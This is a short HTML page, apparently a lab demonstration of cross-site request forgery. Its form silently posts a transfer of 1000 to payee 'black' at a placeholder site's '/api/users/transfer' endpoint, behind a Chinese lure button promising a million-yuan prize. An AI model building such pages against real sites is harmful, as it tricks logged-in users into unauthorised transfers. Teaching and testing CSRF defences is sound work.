<!DOCTYPE html>
<html>
  <head>
    <title>Web B</title>
    <link rel="stylesheet" href="/stylesheets/style.css" />
  </head>
  <body>
    <h2>Welcome to WebSite B</h2>

    <form name="form" action="http://www.a.com/api/users/transfer" method="post">
      <input name="payee" value="black" />
      <input name="amount" value="1000" />
      <button>点我拿100万大奖</button>
    </form>
    <!-- <iframe src="/csrf.html"></iframe> -->
  </body>
</html>
